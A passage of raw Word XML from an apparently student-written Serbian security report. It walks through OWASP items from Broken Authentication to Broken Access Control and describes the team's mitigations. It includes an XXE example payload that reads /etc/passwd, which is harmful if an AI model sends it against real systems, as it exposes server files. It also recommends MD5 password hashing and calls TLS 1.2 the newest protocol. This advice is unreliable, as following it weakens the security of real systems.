          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">pstmt.setString(1, name); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>ResultSet results = pstmt.execu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>teQuery( );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Pored SQL Injection-a, relevantan napad je i LOG Injection, koji se rešava primenom Logger klase u sastavu slf4j biblioteke.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9351" w:type="dxa"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="8248"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4948">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>A2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8247" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Broken Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Funkcionalnosti u vezi sa autentifikacijom i upravljanjem sesijama često su u aplikaciji </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>implementirane na pogrešan način, te dozvoljavaju napadačima da kompromituju lozinke, ključeve ili tokene, ili da eksploatišu ostale implementacione greške kako bi pogodili identitete (kredencijale) ostalih korisnika.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Primer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Maliciozni napadač ima validn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">u listu najčešće korišćenih lozinki. Upotrebom brute force napada, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>napadač pokušava da pogodi tačnu kombinaciju korisničkog imena i lozinke.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Username:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:tab/>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:tab/>
        <w:t>Username: user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Password:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:tab/>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:tab/>
        <w:t>Password: 12345</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="D4128F"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>U našem sistemu:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sigurnosna pitanja koja smo uveli u sistem su: "Kako se zvala Vaša prva simpatija?", "Kako se prezivao nastavnik koji Vam je dao prvu lošu ocenu u osnovnoj školi?", "Koji je bio nadimak Vašeg najboljeg druga u osnovnoj školi?". Da bi naša aplikacija bila </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>otporna na brute force napade, lozinke koje se koriste u sistemu podvrgnute su rigoroznoj kontroli – provera dužine (minimalan broj karaktera mora biti veći od 10 a maksimalno 30) i provera jačine lozinke (izbegavanje šablona, obavezan unos kombinacije koj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>a se sastoji od malih slova, velikih slova, specijalnih karaktera i brojeva</w:t>
      </w:r>
      <w:r w:rsidR="004A72BC">
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> - ovo sve je realizovano upotrebom regularnih izraza</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>). Šablone izbegavamo tako što u sistemu postoji fajl sa najčešće korišćenim lozinkama - sadržaj tog fajla poredimo sa unetom lozinkom</w:t>
      </w:r>
      <w:r w:rsidR="004A72BC">
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ako se uneta lozinka poklapa sa nekim od šablona, korisnik mora uneti novu lozinku</w:t>
      </w:r>
      <w:r w:rsidR="004A72BC">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>. U slučaju da maliciozni napadač pokuša da res</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">etuje lozinku nekog korisnika, aplikacija </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">šalje zahtev za resetovanje (analogno i za promenu) na email adresu korisnika koji je uputio zahtev – promena će biti </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>izvršena tek kada korisnik poseti prateći link</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>. Session ID nije vidljiv u URL-u i važi isključiv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>o u toku jedne ostvarene sesije.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9351" w:type="dxa"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="8248"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4948">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>A3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8247" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Sensitive Data Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Mnoge web aplikacije i API-ji ne štite adekvatno osetljive podatke (poput finansijskih, zdravstvenih podataka, poslovnih tajni i sl). Napadači mogu ukrasti ili modifikovati ovako slabo zaštićen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>e podatke kako bi izveli prevare kreditnim karticama, krađu identiteta ili druge kriminalne radnje. Ukoliko nema odgovarajuće zaštite, poput enkripcije podataka u tranzitu ili skladištu, ili posebnih mera predostrožnosti pri razmeni sa browser-om, osetljiv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>i podaci mogu biti kompromitovani. Trebalo bi se oslanjati na odgovarajuće zakonske regulative koje utiču na smanjenje pojave ove vrste napada (EU’s General Data Protection Regulation).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Primer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Aplikacija je enkriptovala broj kreditne kartice u bazu oslan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>jajući se na podrazumevanu enkripciju baze. Pri preuzimanju, podaci se automatski dekriptuju i samim tim postaju podložni SQL Injection napadima kojima bi se mogao preuzeti broj kreditne kartice u formi običnog teksta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="D4128F"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">U našem sistemu: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">realno je očekivati da napadač pokuša da pristupi korisničkim kredencijalima i  zloupotrebi ih. Kako bismo to predupredili, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t>koristimo MD5 algoritam za heširanje lozinke koju u tom formatu smeštamo u bazu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>. Podatke u tranzitu štitimo upotrebom najnovije verz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">ije TLS protokola, 1.2. Takođe vodimo računa o tome da privatni i javni ključevi budu propisno zaštićeni (adekvatna dužina ključa i primena dovoljno dobrih algoritama za njihovo generisanje – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t>SHA256WithRSAEncryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>). Za skladišenje ključeva koristimo Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> KeyStore.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9351" w:type="dxa"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="8248"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4948">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>A4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8247" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>XML External Entities (XXE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Mnogi stariji XML procesori dozvoljavaju specifikovanje eksternog entiteta, URI-ja koji je dereferenciran i evaluiran tokom procesiranja XML-a. Napadač eksploatiše nedostatke XML procesora ukoliko može da upload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>-uje čitav XML ili da ubaci maliciozni sadržaj u XML dokument.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Primer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Najčešća realizacija ove vrste napada jeste putem upload-ovanja malicioznog XML fajla. Jedan od scenarija napada je pokušaj izvlačenja podataka sa servera:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;?xml version=”1.0” encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>=”ISO-8859-1”?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;!ELEMENT foo ANY&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY xxe SYSTEM </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="34"/>
            <w:szCs w:val="34"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>file:///etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>&gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="D4128F"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>U našem sistemu:</w:t>
      </w:r>
      <w:r w:rsidR="004A72BC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="D4128F"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A72BC">
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Ovu vrstu napada </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> izbegavamo tako što vršimo validaciju XML šeme </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t>(WSDL stil je wrapped-document/literal)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Consolas"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t>U aplikaciji je korišćen JAXB2 parser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9351" w:type="dxa"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="8248"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4948">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>A5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8247" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Ograničenja koja se dodeljuju autentifikovanom </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
